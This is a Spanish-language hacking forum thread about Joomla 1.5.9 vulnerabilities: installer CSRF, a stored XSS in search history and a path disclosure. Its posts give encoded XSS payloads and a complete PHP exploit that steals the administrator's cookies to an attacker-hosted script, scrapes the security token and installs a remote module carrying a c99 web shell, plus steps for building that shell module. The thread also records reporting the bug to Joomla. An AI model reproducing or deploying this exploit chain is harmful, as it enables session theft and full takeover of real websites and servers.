Múltiples fallas en Joomla 1.5.9 + PoC [Instalacion de una shell]

Iniciado por WHK, 9 Febrero 2009, 23:22 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3
Acciones del Usuario

WHK

#10
15 Febrero 2009, 05:40 AM Ultima modificación: 15 Febrero 2009, 05:42 AM por WHK
CSRF en el Componente "Installer"

Bueno ya encontré otra falla  :P pero como todas las demás es poco probable su explotación inmediata pero posiblemente futura.
Esta ves es un CSRF en el componente "Installer" donde el paquete ya sea plugin o módulo se sube e instala sin ningún tipo de Token de seguridad por lo cual si logras encontrar un CSRF en un <imput type="file"> podrás causar la instalación arbitraria de componentes, plantillas, módulos etc, incluso hasta podrías subir tu propia shell.

Citarhttp://www.ejemplo.com/portada/administrator/index.php

POST /portada/administrator/index.php HTTP/1.1
Host: www.ejemplo.com
User-Agent: Mozilla/5.0 (es-ES; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.ejemplo.com/portada/administrator/index.php?option=com_installer
Cookie: Oculta
Authorization: Oculta
Content-Type: multipart/form-data; boundary=---------------------------169443243924626
Content-Length: 1022
-----------------------------169443243924626
Content-Disposition: form-data; name="install_package"; filename="test.zip"
Content-Type: application/zip


HTTP/1.x 200 OK
Date: Sun, 15 Feb 2009 04:37:57 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Encoding: gzip
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 15 Feb 2009 04:38:10 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
----------------------------------------------------------
Y donde está el token nuevamente????

Talves la gente que vea estos post dirán que ando mal del mate (mal de la cabeza) porque este tipo de fallas hoy en dia no son explotables o por lo menos no por alguna técnica pública pero algún dia aparecerán y el dia en que esto suceda joomla será unos de los primeros candidatos para la explotación de estas múltiples fallas.

WHK

#11
15 Febrero 2009, 07:12 AM Ultima modificación: 15 Febrero 2009, 07:26 AM por WHK
XSS Permanente en el componetne "Search"

Un amigo por el mensajero me comentaba sobre algunas personas que se dedican a la programación que dicen "como es inexplotable no se parcha" y es entendible, si ves un bug que para ti es inexplotable lo mas probable es que no lo repares porque supuestamente no tiene ningún riesgo hasta que aparece la gente que si lo logra entonces recién lo reparan. En este caso creo que es similar ya que en el componente search dentro del panel de administración se puede ver el historial de busqueda y me llevé la sorpresa de que este no filtra ningún carácter y me pregunté.. "¿Porque??" entonces mejor comenzé a instalar joomla en mi localhost para ya no seguir desmadrando mi sitio  :P y pude comprobar que el componente Search de la portada o sea el que ve el visitante ya tiene un filtro el cual elimina todos los caácteres después del "<" por lo tanto pensando como el codeador "esto es inexplotable así que no nos preocupamos por mostrar el historial de busquedas en la administración poniendo ningún filtro", pero que pasa si logro evadir ese filtro? puedo comprometer al administrador? la respuesta es si y eso fue lo que sucedió.

Citar%3c%53%43%72%49%70%54%20%78%3d%78%3e%61%6c%65%72%74%28%30%30%30%30%30%29%3c%2f%73%43%72%49%70%54%3e
Esto equivale a
Citar<SCrIpT x=x>alert(00000)</sCrIpT>
Lo ponemos dentro de la caja del buscador y nos enviará directamente al formulario del buscador avanzado con esta busqueda sin ser filtrada, ahora cuando el joomla tiene petysurl activado lo hace via petición GET y no POST así que hay que doble encodear cada carácter, por ejemplo:
Citarhttp://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
Con esto ya el administrador podrá ver en su hermoso historial su XSS:
Citarhttp://127.0.0.1/joomla/administrator/index.php?option=com_search


Tamaño original: http://img443.imageshack.us/img443/9854/dibujo2zq7.png

Mientras tanto que aparece el parche o actualización de joomla puedes desactivar el historial del buscador.

Ya con todo esto como que estamos listos para crear nuestro exploit con token y todo, hacemos un php que lanze una petición POST al buscador y seguidamente lanzamos la redirección hacia el componente afectado para causar la ejecución arbitraria, luego el xss llamará a un archivo de javascript alojado en otro servidor que realizará las acciones y estas serán obtener el token de seguridad y agregar un nuevo superadministrador para nosotros, seguido por la creación de un componente con una shell c99 incrustada para ganar el acceso total al servidor y si es posible rootearlo dependiendo de la versión del mismo y el estado de seguridad que pueda tener.

Voy a ir preparando los archivos para explicar paso por paso como hacerlo. Hasta la prox.

WHK

#12
15 Febrero 2009, 17:52 PM Ultima modificación: 16 Febrero 2009, 00:23 AM por WHK
Encontré varios file disclosure en caso de que puedas tener acceso a la administración y necesites saber la ruta exacta del script.
Subes un archivo zip vacio al instalador de paquetes y te debuelve algo como esto:
CitarWarning: zip_read() expects parameter 1 to be resource, integer given in /var/www/public_html/portada/libraries/joomla/filesystem/archive/zip.php on line 234

PD: Me acaban de borrar el tema en el foro de joomla y les mandé un tracker pero no lo publicaron, será que no quieren que la gente sepa de la falla de seguridad hasta que salga el parche oficial? y hace tres dias que lo mandé a milw0rm y tampoco me han hecho caso jaja bueno, que cosas. Si sienten que estoy peinando la muñeca me avisan XD

JosS__!

#13
25 Febrero 2009, 16:03 PM
Muy buen post WHK, la verdad es que siempre gusta testear los CMS más usados y conocer sus fallas.

Pero en último bug que publicaste (arriba de este post) nombras file disclosure, y yo no veo la existencia de esa vulnerabilidad. En todo caso PATH DISCLOSURE.

Que por cierto, en su día publique algo parecido para LOKICMS.

LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
http://milw0rm.com/exploits/6737


Saludos!!

WHK

#14
26 Febrero 2009, 03:27 AM
Si, tienes razón no es file disclosure sino path disclosure  :P

CitarLokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
http://milw0rm.com/exploits/6737
Tu tienes suerte  :P no se porqué pero sty0ke no publicó el bug de joomla 1.5.9 pero bueno, que le vamos a hacer. Ultimamente he estado mas censurado que pelicula porno en jardin infantil.

JosS__!

#15
26 Febrero 2009, 15:39 PM
Citar
Tu tienes suerte  :P no se porqué pero sty0ke no publicó el bug de joomla 1.5.9 pero bueno, que le vamos a hacer. Ultimamente he estado mas censurado que pelicula porno en jardin infantil.

jaja bueno ... a mi también me han rechazado más de un bug, pero esto se debe a que no se puede publicar cualquier fallo, ya que muchos carecen de importancia. En tu caso, con el bug de path disclosure yo lo veo lógico que no te lo publicaran ya que para poder explotarlo debes tener acceso al panel de admin, y desde luego con acceso al panel seguro que hay distintas formas de mirar el PATH completo de cms y muchas cosas más interesantes que esta. Sin embargo, si se pudiera llevar con éxito esa misma vulnerabilidad sin permisos de admin, estoy seguro de que lo publicarían.

Pero desde luego, como ejemplo para los aprendices es un estupendo PoC para testear.

Saludos!

WHK

#16
27 Febrero 2009, 03:25 AM
Bueno, el que envié a milw0rm fue el xss persistente en el buscador pero naa, hagan lo que quieran, al final ni se publicó ni se solucionó, cuando alguien comienze a desmadrar sitios con joomla entonces ahi si se van a preocupar.

Por ahi alguien me nombró el termino del "Quemeimportismo".

WHK

#17
23 Marzo 2009, 03:36 AM Ultima modificación: 23 Marzo 2009, 04:25 AM por WHK
Lo prometido es deuda..
Hize un video y un exploit pero que hace?, solamente haces que un usuario con derechos de administración visualiza este script para que se le suba automaticamente una shell c99 eso es todo y al finalizar el script te deja un log diciendote si falló o donde quedó finalemnte la shell.
Lo único que deben modificar es la ruta del paquete de joomla que contiene la shell (ya les mostraré como fabricarlo) y la ruta del sistema vulnerable.

Código (php) [Seleccionar]
<?php
error_reporting(0);

$EXPL['SITIO_VULNERABLE'] = 'http://127.0.0.1/joomla/'// Web vulnerable
$EXPL['URL_COM_SHELL'] = 'http://201.223.24.232:81/mod_arkimest.zip'// La shell

$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';

if($_GET['act'] == 'js'){
 die('
 // Acá tu laaaargo script
 
 var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
 function base64_encode(input){
  var output = "";
  var chr1, chr2, chr3;
  var enc1, enc2, enc3, enc4;
  var i = 0;
  do{
   chr1 = input.charCodeAt(i++);
   chr2 = input.charCodeAt(i++);
   chr3 = input.charCodeAt(i++);
   enc1 = chr1 >> 2;
   enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
   enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
   enc4 = chr3 & 63;
   if(isNaN(chr2)){
    enc3 = enc4 = 64;
   }else if(isNaN(chr3)){
    enc4 = 64;
   }
   output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
  }while(i < input.length);
  return output;
 }
 
 window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');

}elseif($_GET['act'] == 'galletas'){
 if(!$cookies base64_decode($_GET['sabor'])) die('<strong>No hay galletas ni chocolates :(</strong>');
 $buffer http_get($EXPL['SITIO_VULNERABLE'].'/administrator/index.php?option=com_installer'$cookies);
 $buscar explode('hidden" name="'$buffer);
 foreach($buscar as $encontrado){
  $encontrado explode('"'$encontrado);
  $encontrado $encontrado[0];
  if(strlen($encontrado) == 32){
   $hash $encontrado;
   break;
  }
 }
 $buffer http_post(
  $EXPL['SITIO_VULNERABLE'].'/administrator/index.php'$cookies
  $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
 );
 if(eregi('200 OK'http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
  // Explotación ejecutada con éxito! la shell está en /modules/mod_artimesk/mod_artimesk.php
  header('Explotado-por: WHK');
  $explotado true;
 }else{
  // La explotación ha fallado.
  $explotado false;
 }
 if($archivo_handle fopen('log_('.date('Y.m.d.H.i.s').')_.txt''x')){
  if($explotado){
   fwrite($archivo_handle'La shell ha sido obtenida exitosamente!. URL: '.$EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
   header('location: https://foro.elhacker.net/nivel_web/multiples_fallas_csrf_xss_directoindirecto_en_joomla_159-t244742.0.html');
  }else{
   fwrite($archivo_handle'El sitio '.$EXPL['SITIO_VULNERABLE'].' no pudo ser explotado debido a que la versión de joomla no es compatible o el administrador no tenía acceso a su rpopio sitio web.'."\x0D\x0A");
   header('location: http://noscript.net/');
  }
  fclose($archivo_handle);
 }
 exit($explotado);
}

// Ejecuta el código javascript arbitrario
$pedir $EXPL['SITIO_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir'null[]=token')){
 header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
 die('hola :-s');
}

function http_post($url$cookies$postdata){
 $timeout 100;
 $ch curl_init($url);
 curl_setopt($chCURLOPT_POSTtrue);
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 curl_setopt($chCURLOPT_FOLLOWLOCATIONfalse);
 curl_setopt($chCURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($chCURLOPT_HEADERtrue);
 curl_setopt($chCURLOPT_POSTFIELDS$postdata);
 curl_setopt($chCURLOPT_COOKIE$cookies);
 $contenido curl_exec($ch);
 $error curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}

function http_get($url$cookies){
 $timeout 100;
 $ch curl_init($url);
 curl_setopt($chCURLOPT_POSTfalse);
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 curl_setopt($chCURLOPT_FOLLOWLOCATIONfalse);
 curl_setopt($chCURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($chCURLOPT_HEADERtrue);
 curl_setopt($chCURLOPT_COOKIE$cookies); 
 $contenido curl_exec($ch);
 $error curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}

?>

Como crear el Componente con la shell dentro?

mod_artimesk.xml
Código (xml) [Seleccionar]
<?xml version="1.0" encoding="utf-8"?>
<install type="module" version="1.0.0">
<name>WHK Arkimest</name>
<author>WHK</author>
<creationDate>March 2009</creationDate>
<copyright>Copyright (C) WHK 2009. All rights reserved.</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authorEmail>www.kernel32@gmail.com</authorEmail>
<authorUrl>foro.elhacker.net</authorUrl>
<version>1.0.0</version>
<description>Artimesk</description>
<files>
<filename module="mod_artimesk">mod_artimesk.php</filename>
</files>
</install>

Donde dice "mod_artimesk.php" es el archivo que lleva la shell.

mod_artimesk.php
Código (php) [Seleccionar]
<?php /* acá mi shell */ ?>
Puedes poner lo que quieras o puedes usar directamente una shell c99 renombrada a mod_artimesk.php tal como esta: http://www.geocities.com/zkizzik/c99.txt

Toma esos dos archivos y guardalo en zip y ya tienes tu módulo shell para joomla ^^

VIDEO
[youtube=600,500]http://www.youtube.com/watch?v=C-J15H8FT5w&feature=player_embedded[/youtube]

Ver video en tamaño completo:
http://lab.jccharry.com/joomla/xss2shell159/

Novlucker

#18
23 Marzo 2009, 03:49 AM
Interesante  :P, he visto el video y solo puedo decir una cosa, tu si sabes elegir la música de fondo  ;-)

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

WHK

#19
26 Marzo 2009, 03:34 AM
Me ha llegado un correo desde Joomlacode.org y al parecer si les ha dolido un poco el video porque acaban de reabrir el tema que les habia enviado en el tracker donde exponía todo esto, al parecer en ese entonces no le dieron para nada importancia ya que hasta lo habian cerrado pero ahora después del video lo acaban de reabrir sin acceso a la totalidad del público y lo clasificaron como alto impacto XD

CitarJoomla 1.5.X item #15065, was opened at 2009-02-15 12:02:16

Priority: 3
Submitted By: zkizzik zkizzik (zkizzik)
> >Assigned to: Anthony Ferrara (ircmaxell)
Summary: Múltiples fallas - CSRF, XSS, Path disclosure
> >Joomla Version: 1.5.9
> >Impact: High
Status: Open
> >Source: http://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159-t244742.0.html

> >Severity: Moderate
> >Duration (Days):
Estimated Effort (Hours):
Percent Complete (0-100):


Initial Comment:
http://forum.joomla.org/viewtopic.php?f=300&t=371705
http://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159-t244742.0.html

En estos dos enlaces expuse las múltiples fallas que pude encontrar y no se cuantos mas pueda ver pero al parecer hay bastantes mas que siguen con el mismo criterio.
Escribir una por una en este lugar creo que sería mucho por eso puse los enlaces.

El tracker está acá
http://joomlacode.org/gf/project/jsecurity/tracker/?action=TrackerItemEdit&tracker_id=7925&tracker_item_id=15065
tal como lo dice el correo pero al ingresar me deniega el acceso  :P
CitarPágina de Inicio » Permission Denied
Permission Denied

Por lo menos ahora si van a  pensar en repararlo.
Imprimir
Ir Arriba Páginas 1 2 3
Acciones del Usuario